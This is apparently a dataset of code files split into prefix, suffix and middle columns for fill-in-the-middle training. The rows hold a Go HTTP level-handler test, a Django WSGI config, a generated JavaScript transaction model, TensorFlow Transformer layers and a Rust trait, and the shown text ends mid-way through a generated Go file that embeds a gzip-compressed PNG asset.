file_name (string, 3–137 chars) | prefix (string, 0–918k chars) | suffix (string, 0–962k chars) | middle (string, 0–812k chars)
---|---|---|---
http_handler_test.go | // Copyright (c) 2016 Uber Technologies, Inc.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
package zap_test
import (
"encoding/json"
"fmt"
"io"
"io/ioutil"
"net/http"
"net/http/httptest"
"strings"
"testing"
. "github.com/reddit/zap"
"github.com/reddit/zap/zapcore"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
)
func newHandler() (AtomicLevel, *Logger) {
lvl := NewAtomicLevel()
logger := New(zapcore.NewNopCore())
return lvl, logger
}
func assertCodeOK(t testing.TB, code int) {
assert.Equal(t, http.StatusOK, code, "Unexpected response status code.")
}
func assertCodeBadRequest(t testing.TB, code int) {
assert.Equal(t, http.StatusBadRequest, code, "Unexpected response status code.")
}
func assertCodeMethodNotAllowed(t testing.TB, code int) {
assert.Equal(t, http.StatusMethodNotAllowed, code, "Unexpected response status code.")
}
func assertResponse(t testing.TB, expectedLevel zapcore.Level, actualBody string) {
assert.Equal(t, fmt.Sprintf(`{"level":"%s"}`, expectedLevel)+"\n", actualBody, "Unexpected response body.")
}
func assertJSONError(t testing.TB, body string) {
// Don't need to test exact error message, but one should be present.
var payload map[string]interface{}
require.NoError(t, json.Unmarshal([]byte(body), &payload), "Expected error response to be JSON.")
msg, ok := payload["error"]
require.True(t, ok, "Error message is an unexpected type.")
assert.NotEqual(t, "", msg, "Expected an error message in response.")
}
func makeRequest(t testing.TB, method string, handler http.Handler, reader io.Reader) (int, string) {
ts := httptest.NewServer(handler)
defer ts.Close()
req, err := http.NewRequest(method, ts.URL, reader)
require.NoError(t, err, "Error constructing %s request.", method)
res, err := http.DefaultClient.Do(req)
require.NoError(t, err, "Error making %s request.", method)
defer res.Body.Close()
body, err := ioutil.ReadAll(res.Body)
require.NoError(t, err, "Error reading request body.")
return res.StatusCode, string(body)
}
func TestHTTPHandlerGetLevel(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "GET", lvl, nil)
assertCodeOK(t, code)
assertResponse(t, lvl.Level(), body)
}
func TestHTTPHandlerPutLevel(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "PUT", lvl, strings.NewReader(`{"level":"warn"}`))
assertCodeOK(t, code)
assertResponse(t, lvl.Level(), body)
}
func TestHTTPHandlerPutUnrecognizedLevel(t *testing.T) |
func TestHTTPHandlerNotJSON(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "PUT", lvl, strings.NewReader(`{`))
assertCodeBadRequest(t, code)
assertJSONError(t, body)
}
func TestHTTPHandlerNoLevelSpecified(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "PUT", lvl, strings.NewReader(`{}`))
assertCodeBadRequest(t, code)
assertJSONError(t, body)
}
func TestHTTPHandlerMethodNotAllowed(t *testing.T) {
lvl, _ := newHandler()
code, body := makeRequest(t, "POST", lvl, strings.NewReader(`{`))
assertCodeMethodNotAllowed(t, code)
assertJSONError(t, body)
}
| {
lvl, _ := newHandler()
code, body := makeRequest(t, "PUT", lvl, strings.NewReader(`{"level":"unrecognized-level"}`))
assertCodeBadRequest(t, code)
assertJSONError(t, body)
} |
wsgi.py | """
WSGI config for seedstars_contacts project.
It exposes the WSGI callable as a module-level variable named ``application``. | """
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "seedstars_contacts.settings")
application = get_wsgi_application() |
For more information on this file, see
https://docs.djangoproject.com/en/1.9/howto/deployment/wsgi/ |
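The `wsgi.py` row above only wires up the callable; as a purely illustrative sketch (not part of the dataset row), the module-level `application` could be served with the standard library's `wsgiref`, assuming the `seedstars_contacts` package is importable — a production deployment would instead point gunicorn or uWSGI at `seedstars_contacts.wsgi:application`:

```python
# Minimal, illustrative sketch — not part of the dataset row above.
# Assumes the seedstars_contacts project package is on PYTHONPATH.
from wsgiref.simple_server import make_server

from seedstars_contacts.wsgi import application  # the module-level WSGI callable

httpd = make_server("127.0.0.1", 8000, application)
httpd.serve_forever()  # serve the Django app on http://127.0.0.1:8000/
```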
GetDebitCardTransactionResponse.js | /**
* PagarmeCoreApiLib
*
* This file was automatically generated by APIMATIC v2.0 ( https://apimatic.io ).
*/
'use strict';
const GetTransactionResponse = require('./GetTransactionResponse');
/**
* Creates an instance of GetDebitCardTransactionResponse
*/
class GetDebitCardTransactionResponse extends GetTransactionResponse {
/**
* @constructor
* @param {Object} obj The object passed to constructor
*/
constructor(obj) {
super(obj);
if (obj === undefined || obj === null) return;
this.statementDescriptor =
this.constructor.getValue(obj.statementDescriptor
|| obj.statement_descriptor);
this.acquirerName = this.constructor.getValue(obj.acquirerName || obj.acquirer_name);
this.acquirerAffiliationCode =
this.constructor.getValue(obj.acquirerAffiliationCode
|| obj.acquirer_affiliation_code);
this.acquirerTid = this.constructor.getValue(obj.acquirerTid || obj.acquirer_tid);
this.acquirerNsu = this.constructor.getValue(obj.acquirerNsu || obj.acquirer_nsu);
this.acquirerAuthCode = | || obj.acquirer_auth_code);
this.operationType = this.constructor.getValue(obj.operationType || obj.operation_type);
this.card = this.constructor.getValue(obj.card);
this.acquirerMessage =
this.constructor.getValue(obj.acquirerMessage
|| obj.acquirer_message);
this.acquirerReturnCode =
this.constructor.getValue(obj.acquirerReturnCode
|| obj.acquirer_return_code);
this.mpi = this.constructor.getValue(obj.mpi);
this.eci = this.constructor.getValue(obj.eci);
this.authenticationType =
this.constructor.getValue(obj.authenticationType
|| obj.authentication_type);
this.threedAuthenticationUrl =
this.constructor.getValue(obj.threedAuthenticationUrl
|| obj.threed_authentication_url);
}
/**
* Function containing information about the fields of this model
* @return {array} Array of objects containing information about the fields
*/
static mappingInfo() {
return super.mappingInfo().concat([
{ name: 'statementDescriptor', realName: 'statement_descriptor' },
{ name: 'acquirerName', realName: 'acquirer_name' },
{ name: 'acquirerAffiliationCode', realName: 'acquirer_affiliation_code' },
{ name: 'acquirerTid', realName: 'acquirer_tid' },
{ name: 'acquirerNsu', realName: 'acquirer_nsu' },
{ name: 'acquirerAuthCode', realName: 'acquirer_auth_code' },
{ name: 'operationType', realName: 'operation_type' },
{ name: 'card', realName: 'card', type: 'GetCardResponse' },
{ name: 'acquirerMessage', realName: 'acquirer_message' },
{ name: 'acquirerReturnCode', realName: 'acquirer_return_code' },
{ name: 'mpi', realName: 'mpi' },
{ name: 'eci', realName: 'eci' },
{ name: 'authenticationType', realName: 'authentication_type' },
{ name: 'threedAuthenticationUrl', realName: 'threed_authentication_url' },
]);
}
/**
* Function containing information about discriminator values
* mapped with their corresponding model class names
*
* @return {object} Object containing Key-Value pairs mapping discriminator
* values with their corresponding model classes
*/
static discriminatorMap() {
return {
debit_card: 'GetDebitCardTransactionResponse',
};
}
}
module.exports = GetDebitCardTransactionResponse; | this.constructor.getValue(obj.acquirerAuthCode |
modules.py | # -*- coding: utf-8 -*-
#!/usr/bin/python2
'''
June 2017 by kyubyong park.
[email protected].
https://www.github.com/kyubyong/transformer
'''
from __future__ import print_function
import tensorflow as tf
import numpy as np
def normalize(inputs,
epsilon = 1e-8,
scope="ln",
reuse=None):
'''Applies layer normalization.
Args:
inputs: A tensor with 2 or more dimensions, where the first dimension has
`batch_size`.
epsilon: A floating number. A very small number for preventing ZeroDivision Error.
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
A tensor with the same shape and data dtype as `inputs`.
'''
with tf.variable_scope(scope, reuse=reuse):
inputs_shape = inputs.get_shape()
params_shape = inputs_shape[-1:]
# Tensor("encoder/num_blocks_0/multihead_attention/ln/moments/mean:0", shape=(32, 10, 1), dtype=float32)
mean, variance = tf.nn.moments(inputs, [-1], keep_dims=True)
beta= tf.Variable(tf.zeros(params_shape))
gamma = tf.Variable(tf.ones(params_shape))
normalized = (inputs - mean) / ( (variance + epsilon) ** (.5) )
outputs = gamma * normalized + beta
return outputs
def embedding(inputs,
vocab_size,
num_units,
zero_pad=True,
scale=True,
scope="embedding",
reuse=None):
'''Embeds a given tensor.
After data_load, x and y have shape [N, T], where N is the batch size and T is the
maximum sentence length maxlen (default 10).
The embedding then adds a hidden_size (num_units) dimension on top of this.
Args:
inputs: A `Tensor` with type `int32` or `int64` containing the ids
to be looked up in `lookup table`.
vocab_size: An int. Vocabulary size.
num_units: An int. Number of embedding hidden units.
zero_pad: A boolean. If True, all the values of the first row (id 0)
should be constant zeros.
scale: A boolean. If True, the outputs are multiplied by sqrt(num_units).
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
A `Tensor` with one more rank than inputs's. The last dimensionality
should be `num_units`.
For example,
```
import tensorflow as tf
inputs = tf.to_int32(tf.reshape(tf.range(2*3), (2, 3)))
outputs = embedding(inputs, 6, 2, zero_pad=True)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print(sess.run(outputs))
>>
[[[ 0. 0. ]
[ 0.09754146 0.67385566]
[ 0.37864095 -0.35689294]]
[[-1.01329422 -1.09939694]
[ 0.7521342 0.38203377]
[-0.04973143 -0.06210355]]]
```
```
import tensorflow as tf
inputs = tf.to_int32(tf.reshape(tf.range(2*3), (2, 3)))
outputs = embedding(inputs, 6, 2, zero_pad=False)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
print(sess.run(outputs))
>>
[[[-0.19172323 -0.39159766]
[-0.43212751 -0.66207761]
[ 1.03452027 -0.26704335]]
[[-0.11634696 -0.35983452]
[ 0.50208133 0.53509563]
[ 1.22204471 -0.96587461]]]
```
'''
with tf.variable_scope(scope, reuse=reuse):
lookup_table = tf.get_variable('lookup_table',
dtype=tf.float32,
shape=[vocab_size, num_units],
initializer=tf.contrib.layers.xavier_initializer())
if zero_pad:
lookup_table = tf.concat((tf.zeros(shape=[1, num_units]),
lookup_table[1:, :]), 0)
# todo: embedding_lookup
outputs = tf.nn.embedding_lookup(lookup_table, inputs)
if scale:
outputs = outputs * (num_units ** 0.5)
return outputs
def positional_encoding(inputs,
num_units,
zero_pad=True,
scale=True,
scope="positional_encoding",
reuse=None):
'''Sinusoidal Positional_Encoding.
Equivalent to adding a constant matrix each time
Args:
inputs: A 2d Tensor with shape of (N, T).
num_units: Output dimensionality
zero_pad: Boolean. If True, all the values of the first row (id = 0) should be constant zero
scale: Boolean. If True, the output will be multiplied by sqrt(num_units) (see the paper for details)
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns:
A 'Tensor' with one more rank than inputs's, whose last dimension is 'num_units'
'''
N, T = inputs.get_shape().as_list()
with tf.variable_scope(scope, reuse=reuse):
# [1, T]: [[0, 1, 2, ..., T-1]] tiled across the batch to [N, T]
position_ind = tf.tile(tf.expand_dims(tf.range(T), 0), [N, 1])
# First part of the PE function: sin and cos argument
# [T, num_units] sin(pos/10000^(2i/dmodel) )
position_enc = np.array([
[pos / np.power(10000, 2.*i/num_units) for i in range(num_units)]
for pos in range(T)])
# Second part: apply sin to the even columns and cos to the odd ones.
position_enc[:, 0::2] = np.sin(position_enc[:, 0::2]) # dim 2i
position_enc[:, 1::2] = np.cos(position_enc[:, 1::2]) # dim 2i+1
# Convert to a tensor
lookup_table = tf.convert_to_tensor(position_enc)
if zero_pad:
lookup_table = tf.concat((tf.zeros(shape=[1, num_units]),
lookup_table[1:, :]), 0)
outputs = tf.nn.embedding_lookup(lookup_table, position_ind)
if scale:
outputs = outputs * num_units**0.5
return outputs
def multihead_attention(queries,
keys,
num_units=None,
num_heads=8,
dropout_rate=0,
is_training=True,
causality=False,
scope="multihead_attention",
reuse=None):
'''Applies multihead attention.
data_load outputs x and y with shape [N, T], where N is the batch size and T is the
maximum sentence length maxlen (default 10).
From libei:
Input Embedding: Batch * Length * Hidden
Positional Encoding: Length * Hidden
Encoder Input = Input Embedding + Positional Encoding
Query,Key,Value = Conv(Encoder Input,Hidden,3*Hidden)
Query = SplitHeads(Query)
Key = SplitHeads(Key)
Value = SplitHeads(Value)
Shape (Batch,Length,Heads,Channels)
Args:
queries: A 3d tensor with shape of [N, T_q, C_q].
keys: A 3d tensor with shape of [N, T_k, C_k].
num_units: A scalar. Attention size.
dropout_rate: A floating point number.
is_training: Boolean. Controller of mechanism for dropout.
causality: Boolean. If true, units that reference the future are masked.
num_heads: An int. Number of heads.
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a previous layer
by the same name.
Returns
A 3d tensor with shape of (N, T_q, C)
'''
with tf.variable_scope(scope, reuse=reuse):
# Set the fall back option for num_units
if num_units is None:
num_units = queries.get_shape().as_list()[-1]
# Linear projections: Q, K and V are each learned through their own projection matrix.
# Newer versions of the code use one large matrix and then split it into three.
# In self-attention (encoder or decoder) Q, K and V all come from the same input;
# in encoder-decoder attention Q comes from the decoder while K and V come from the encoder.
Q = tf.layers.dense(queries, num_units, activation=tf.nn.relu) # (N, T_q, C)
K = tf.layers.dense(keys, num_units, activation=tf.nn.relu) # (N, T_k, C)
V = tf.layers.dense(keys, num_units, activation=tf.nn.relu) # (N, T_k, C)
# Split and concat
# split into num_heads (default 8) heads
Q_ = tf.concat(tf.split(Q, num_heads, axis=2), axis=0) # (h*N, T_q, C/h)
K_ = tf.concat(tf.split(K, num_heads, axis=2), axis=0) # (h*N, T_k, C/h)
V_ = tf.concat(tf.split(V, num_heads, axis=2), axis=0) # (h*N, T_k, C/h)
# Multiplication (h*batch,length_q,length_k)
outputs = tf.matmul(Q_, tf.transpose(K_, [0, 2, 1])) # (h*N, T_q, T_k)
# Scale
outputs = outputs / (K_.get_shape().as_list()[-1] ** 0.5)
# Key Masking
# keys that are all-zero along the embedding axis (padding) get masked out
key_masks = tf.sign(tf.abs(tf.reduce_sum(keys, axis=-1))) # (N, T_k)
key_masks = tf.tile(key_masks, [num_heads, 1]) # (h*N, T_k)
key_masks = tf.tile(tf.expand_dims(key_masks, 1), [1, tf.shape(queries)[1], 1]) # (h*N, T_q, T_k)
# tf.expand_dims(input, dim) inserts a dimension of size 1 at position dim
paddings = tf.ones_like(outputs)*(-2**32+1)
outputs = tf.where(tf.equal(key_masks, 0), paddings, outputs) # (h*N, T_q, T_k)
# Causality = Future blinding
if causality:
diag_vals = tf.ones_like(outputs[0, :, :]) # (T_q, T_k)
tril = tf.contrib.linalg.LinearOperatorTriL(diag_vals).to_dense() # (T_q, T_k) triangular matrix
masks = tf.tile(tf.expand_dims(tril, 0), [tf.shape(outputs)[0], 1, 1]) # (h*N, T_q, T_k)
paddings = tf.ones_like(masks)*(-2**32+1)
outputs = tf.where(tf.equal(masks, 0), paddings, outputs) # (h*N, T_q, T_k)
# Activation
outputs = tf.nn.softmax(outputs) # (h*N, T_q, T_k)
# Query Masking
query_masks = tf.sign(tf.abs(tf.reduce_sum(queries, axis=-1))) # (N, T_q)
query_masks = tf.tile(query_masks, [num_heads, 1]) # (h*N, T_q)
query_masks = tf.tile(tf.expand_dims(query_masks, -1), [1, 1, tf.shape(keys)[1]]) # (h*N, T_q, T_k)
outputs *= query_masks # broadcasting; resulting shape (h*N, T_q, T_k)
# Dropouts
outputs = tf.layers.dropout(outputs, rate=dropout_rate, training=tf.convert_to_tensor(is_training))
# Weighted sum
outputs = tf.matmul(outputs, V_) # ( h*N, T_q, C/h)
# note: the final output linear projection from the paper is omitted here
# Restore shape
outputs = tf.concat(tf.split(outputs, num_heads, axis=0), axis=2 ) # (N, T_q, C)
# Residual connection
outputs += queries
# Normalize
outputs = normalize(outputs) # (N, T_q, C)
return outputs
def feedforward(inputs,
num_units=[2048, 512],
scope="multihead_attention",
reuse=None):
'''Point-wise feed forward net.
Args:
inputs: A 3d tensor with shape of [N, T, C].
num_units: A list of two integers.
scope: Optional scope for `variable_scope`.
reuse: Boolean, whether to reuse the weights of a pre |
For example,
```
import tensorflow as tf
inputs = tf.convert_to_tensor([[[0, 0, 1],
[0, 1, 0],
[1, 0, 0]],
[[1, 0, 0],
[1, 0, 0],
[0, 1, 0]]], tf.float32)
outputs = label_smoothing(inputs)
with tf.Session() as sess:
print(sess.run([outputs]))
>>
[array([[[ 0.03333334, 0.03333334, 0.93333334],
[ 0.03333334, 0.93333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334]],
[[ 0.93333334, 0.03333334, 0.03333334],
[ 0.93333334, 0.03333334, 0.03333334],
[ 0.03333334, 0.93333334, 0.03333334]]], dtype=float32)]
```
'''
K = inputs.get_shape().as_list()[-1] # number of channels
return ((1-epsilon) * inputs) + (epsilon / K)
| vious layer
by the same name.
Returns:
A 3d tensor with the same shape and dtype as inputs
'''
with tf.variable_scope(scope, reuse=reuse):
# Inner layer
params = {"inputs": inputs, "filters": num_units[0], "kernel_size": 1,
"activation": tf.nn.relu, "use_bias": True}
outputs = tf.layers.conv1d(**params)
# Readout layer
params = {"inputs": outputs, "filters": num_units[1], "kernel_size": 1,
"activation": None, "use_bias": True}
outputs = tf.layers.conv1d(**params)
# Residual connection
outputs += inputs
# Normalize
outputs = normalize(outputs)
return outputs
def label_smoothing(inputs, epsilon=0.1):
'''Applies label smoothing. See https://arxiv.org/abs/1512.00567.
Args:
inputs: A 3d tensor with shape of [N, T, V], where V is the number of vocabulary.
epsilon: Smoothing rate.
|
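The `positional_encoding` function in the row above builds its sinusoidal table with plain NumPy before converting it to a tensor. Here is a small standalone sketch of that same table construction (illustrative only — `T=10` mirrors the default `maxlen` mentioned in the docstrings, and `num_units=4` is an arbitrary choice):

```python
import numpy as np

# Standalone sketch of the sinusoidal table built inside positional_encoding().
# T and num_units are illustrative assumptions (T=10 matches the default maxlen).
T, num_units = 10, 4
position_enc = np.array([
    [pos / np.power(10000, 2. * i / num_units) for i in range(num_units)]
    for pos in range(T)])
position_enc[:, 0::2] = np.sin(position_enc[:, 0::2])  # even dimensions get sin
position_enc[:, 1::2] = np.cos(position_enc[:, 1::2])  # odd dimensions get cos
print(position_enc.shape)  # (10, 4): one row per position, one column per unit
```

In the TensorFlow code this array is then wrapped with `tf.convert_to_tensor` and looked up per position index, exactly as for the word embeddings.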
treemeta.rs | // Copyright 2020 MaidSafe.net limited.
// | // https://opensource.org/licenses/BSD-3-Clause>, at your option. This file may not be copied,
// modified, or distributed except according to those terms. Please review the Licences for the
// specific language governing permissions and limitations relating to use of the SAFE Network
// Software.
/// `TreeMeta` represents the app-defined data that an application stores in each node
/// of the tree.
pub trait TreeMeta: Clone {}
impl<TM: Clone> TreeMeta for TM {} | // This SAFE Network Software is licensed to you under the MIT license <LICENSE-MIT
// http://opensource.org/licenses/MIT> or the Modified BSD license <LICENSE-BSD |
b0xfile_assets_openstack_operations_optimization_congress.png.go | // Code generaTed by fileb0x at "2020-09-25 22:38:51.170485 +0300 MSK m=+2.415579599" from config file "b0x.yml" DO NOT EDIT.
// modified(2020-09-25 20:02:04.092428015 +0300 MSK)
// original path: ../../assets/openstack/operations/optimization/congress.png
package assets
import (
"bytes"
"compress/gzip"
"io"
"os"
)
// FileAssetsOpenstackOperationsOptimizationCongressPng is "assets/openstack/operations/optimization/congress.png"
var FileAssetsOpenstackOperationsOptimizationCongressPng = []byte("\x1f\x8b\x08\x00..." /* gzip-compressed PNG data, truncated in this preview */)
x9d\xd2\x3d\x6b\x8e\xed\x86\x39\xf9\x3b\xd3\x53\x9c\x4d\x5c\xa1\x25\x40\x22\x73\x10\xdf\x22\xfd\x1e\xa5\x50\x50\xd4\x79\x3d\xb7\x8b\x62\xd9\xa6\xc3\xbc\x03\x9f\x63\x2b\xe4\x36\xa8\xf7\x0e\xad\x17\xe4\xa6\xc3\xb1\xff\x65\xf6\xce\xfd\x21\x6e\x5c\x71\x97\x25\x2e\x7c\x75\x12\x74\xa6\x5d\x9b\xc1\x3c\xad\xee\xea\x87\xf3\x3c\xd0\x18\x64\x7a\x9a\xc9\x73\x37\x79\x47\x33\x50\x7d\x86\xaa\x48\x13\x12\x63\x0d\x97\xf4\x91\x77\x87\xfe\x48\xf8\x0f\x21\xc9\x0a\xbc\x21\xfb\xd5\x3d\xc6\xad\x7d\x38\x5b\xf2\x5d\x38\xcb\xae\x52\xe0\xe9\xd7\x2f\xe7\xbf\xe1\x3b\x18\x91\x7b\x87\x40\xcc\xa5\xaa\xc6\x82\xe7\x73\xc9\xef\x6b\x8d\x5d\x24\xfc\xce\xdb\x46\xfd\x39\x29\x22\xd0\xe3\xb9\x88\x71\x9e\x84\x95\xf0\xbf\x6c\x1c\x6c\xe7\xcc\x08\xff\x6c\x79\x45\x9c\xfe\xc2\xe7\xba\xeb\xd5\x2b\x8a\xc3\x2f\xaf\x1e\xc1\x58\x92\x99\x64\x9b\xf3\x30\x08\x94\xf8\x86\x17\x54\x20\x5e\x8d\xd9\x5f\x1c\x54\x57\x4f\xf1\x47\x71\x4c\xc8\xe7\x5c\xc2\x0f\x5a\xd4\xf1\xb7\x9a\x81\x3a\xd5\x52\x14\xbb\xd7\x2c\xd5\xaf\x76\x66\xd7\xaa\xe8\xc6\xde\xbc\x84\x4b\x70\xd9\x3f\x70\x0e\x16\xa0\x6c\x33\x2e\xe8\xf8\x60\xaa\x37\x25\xff\xe3\x06\xb4\xa4\x8f\x11\xad\x21\xb6\xa1\xdb\xf3\x46\x0b\x17\xbf\x66\x7e\xc6\xa1\xda\x98\xb7\xee\xde\x65\xb9\x80\x6f\x5d\xef\xe5\x8a\x42\x05\xcc\x5f\x17\xbf\x8a\xbd\x25\xa4\xba\xdc\x52\x1b\x0c\x04\x47\x8e\x33\xde\xc4\xaa\xd2\x88\x50\xf8\x8e\x3c\xf6\xa0\xde\x74\x37\xe7\x02\x9d\x60\x8a\xf5\x89\x92\x17\x18\x83\xf0\xce\x89\xfe\x0f\xf5\x61\x1d\xea\xb8\xdf\x04\x42\x48\x0b\xc2\xef\x61\xaf\xf0\xb0\xbb\x25\xe7\xa3\xf6\x7e\x40\xc7\xd8\xbb\xc6\x76\xfb\x93\xe9\x95\xb8\x19\x8d\x3f\x95\xd8\x64\xe4\xf0\xb8\x92\x5d\x9c\x40\x12\x1a\xa4\x8e\xd1\x1b\xf4\xb5\x20\xec\x24\x10\xe3\x86\x37\x7f\x75\x36\x30\x57\x55\x44\x2c\x6b\x6f\x5b\x9c\x69\x85\x5f\xe2\x2a\x0e\x7f\xe1\x09\x8c\xd0\xab\x91\x9f\x9b\x08\xf4\x3c\x2c\x3f\xaa\x26\xcc\x7e\xe2\xf9\x17\xa6\xf7\x62\xd6\x3e\xe5\x14\x98\x7b\xd0\xa9\x9c\x57\x7b\xd0\x47\xf1\x03\x13\x24\xcb\x96\x49\x47\xae\x89\x9f\xa2\x70\xf5\xfc\x2d\xde\xb8\x76\xf5\x4f\x57\x97\x4c\xaf\x51\x79\x97\xce\x9f\x0d\x17\x97\xce\x2b\x87\xbc\xb1\xf9\xfa\x0f\x17\xcf\xb3\x97\x56\x01\x3e\x7f\x2f\x33\x57\x8e\xe0\x1b\xf3\x42\x02\xe3\x9e\x4b\x25\xe5\xe2\x89\x66\x40\xc5\x32\xb3\xf2\x65\x87\x45\x53\xc8\x33\xd0\x31\x27\x2e\x01\x7c\x34\x7c\x04\xdf\xfb\x88\x3c\xbf\xb1\xb7\xe4\x0a\xa1\x93\x94\x1c\x07\x17\x85\xfd\xe0\x94\xbc\x02\xfb\x18\x51\xb4\x7d\xe6\x44\xa4\x09\x2b\xbc\xea\xe7\x90\x45\xfe\xca\x12\xe7\x1f\x81\xea\x41\x2c\x94\x3f\x65\x27\x11\x25\x02\x3d\x35\x5b\x4a\x18\xdf\xba\x3c\x1c\xad\x67\x40\xcd\x7b\xf6\xa5\x71\x59\xaa\x71\x47\xd0\x6b\x6b\x05\x10\x66\x65\x49\x15\xee\xde\x98\x59\x54\x6d\x85\x87\x83\x07\xcb\xc4\x1e\xfe\x95\x05\x84\xea\x4f\xca\xd5\x4a\x5c\xad\x9e\x28\xcf\xf6\xdc\x8a\xc5\xc6\xae\xf6\xe9\xbf\x9c\x8f\x50\x63\x53\x8b\xcf\xfe\x5b\x71\x0b\xa1\x60\x80\x2f\xc5\x65\x90\x83\x48\xe6\xbc\x9f\x8c\xe7\xee\x5c\x1f\xa8\xcd\x23\x1e\x60\x1c\xbf\x86\xbb\x05\x2c\x1f\xa8\xf4\x54\x51\xb2\x8e\x2a\x1c\xf4\xa6\x42\x5f\x29\xd5\x41\xca\xc9\xe7\x9f\xda\x2f\x01\x65\xd6\xdd\x1f\x14\xad\x1e\x42\xf4\x79\xa8\xe3\xdd\x2a\x65\xcb\xb4\x2b\x8d\xaa\xb5\xd8\xd8\x74\x8c\x38\xb4\x0c\x72\xca\x0d\x81\x35\x06\x81\x80\xa2\xb8\x0a\x47\xb9\x5f\x8e\xd8\x34\xfd\xc5\xdd\x17\x12\x4a\xb4\xb8\x3d\xf5\x97\x78\x1d\x32\xc1\x17\xcb\x0d\xae\xf9\x41\x75\x93\xa7\x93\x18\xbc\x5f\xd3\xd9\xd8\x0f\x73\x3b\x3d\x8a\x5e\xd6\x31\x6b\x59\x59\x4f\x99\x6f\xcc\xdc\x43\xd3\x0c\x24\x29\x16\xb4\xc6\x9b\x28\xe2\x12\xc6\xcf\x06\xf7\xee\x58\xe8\xcc\xbe\x80\x3a\xdb\xb4\x66\x01\x60\x22\x0a\xf5\xc3\x8f\xc4\x5a\xd4\xaa\x4c\xfd\x16\x79\x63\x24\x91\x5b\xba\xb5\x62\x92\xa8\x3d\x99\xac\x38\x6d\x9d\x90\x99\x2f\x2e\xee\x08\x0f\xf9
\xef\x77\xe0\xdf\x1a\xf7\x64\x5d\x45\xe1\xe1\x57\xe7\x5f\xc8\xef\xc8\x13\xfe\x38\x59\x7c\x50\x2c\x25\x8d\x93\x6e\x87\x94\x1b\x18\xec\xae\x9f\xa4\xb3\x71\x4e\xdf\xb6\xe3\x53\x30\xae\x6e\x04\x0b\xf9\x9c\x23\xaf\x2e\x5c\x61\xa9\x4a\xa5\xec\xcd\xbb\x2c\xe5\x8a\xbd\x93\xdb\x9b\x87\x2d\xd4\xd9\xbb\xbf\x1d\x3d\x44\x5b\x5e\x48\x78\x15\xf4\xa2\x61\xef\xe1\xc4\x39\x08\x18\xf3\xe5\xa9\x9f\x26\xa3\x42\xfd\xd0\x20\x6d\x9e\x94\xf6\xa1\xb1\x46\xec\x44\xcc\xb3\x9a\xa0\xbf\x75\xb7\xb6\x11\x5d\x96\x5c\x7c\x5d\xf9\xb2\xe3\x17\xd6\x36\x2e\x82\x6f\x03\xad\x0a\x9f\x9d\x02\x42\xc3\x7a\x24\x24\xaf\xe4\x7e\x5c\xad\x53\x07\xf5\x52\x6f\x68\xe4\x9f\x9e\xb2\xb0\x1e\x7c\x1a\x2d\x17\x4b\xbc\x69\x5e\xd2\x67\xf5\x81\xd4\xf5\x89\xb1\xa4\xce\x69\x3a\x39\xc4\xf4\xa2\xa5\x72\xb5\x3d\x73\x44\xed\xc0\x7c\xc7\x61\x79\x15\x78\xe8\xa8\x40\x47\x58\xaf\x5b\xf6\x41\xb9\xfc\xa1\xbd\xbd\xd0\xf3\xa4\x32\x47\x4f\x50\x56\xee\x0d\x70\xd1\xb5\xdd\x4d\x6f\x85\x50\x11\xab\xb4\xf3\x62\xec\x6d\xf5\x60\xd1\xe8\x9f\xd6\xaa\x78\x41\x98\x09\xb8\x65\xae\x94\xd1\xf4\x95\xb6\x46\x2c\x0c\x79\x59\xfe\x18\x60\xae\x00\x42\xdd\x14\x15\xf3\x40\xe8\x58\x30\xde\x72\x6d\xcf\x11\x0f\xcf\x5a\xbd\xb1\x07\xa7\x47\xc4\x39\xd6\x17\x4b\x6f\x65\x1b\xbb\xe4\x24\x6d\xb6\xa6\x46\x2b\x6a\xfe\xa4\xa2\xf2\x6e\x7e\xa2\xa0\x78\x5b\xfb\xd1\xdf\xd4\xb3\x02\x96\x25\x44\x97\x5f\x09\x7e\xa0\xbe\x90\x08\xc8\x30\xf8\xd4\x79\x71\x8d\x1a\x2d\xfd\xcb\x19\x75\x0b\xaa\x5d\x57\xcf\x23\xc8\x3b\x33\xbd\x8f\x32\x99\xe8\xed\x63\x9c\xdc\x77\x91\xe3\x46\x6a\xe3\x7f\xb9\xb3\xbd\x40\x90\x94\x92\x6c\x5e\x2e\xd6\x99\x20\xb8\x29\x2e\xc8\x85\x8b\xc9\x9d\x41\x35\x28\xe1\x41\x3a\xd5\xe4\xb0\x54\xe3\xc4\x5f\xf7\x57\x8b\x83\xb8\x0a\xec\xe4\xb3\xc6\x2e\x02\x25\xce\x5a\x46\x52\x8c\xa5\xe8\x93\x8a\x50\x62\x18\x9b\xff\xc7\x3c\x71\x8b\xdb\x28\x87\x98\x7a\xd2\xb9\xa3\x3c\x29\xd1\x7f\xf9\xe3\xf2\x6b\x3b\x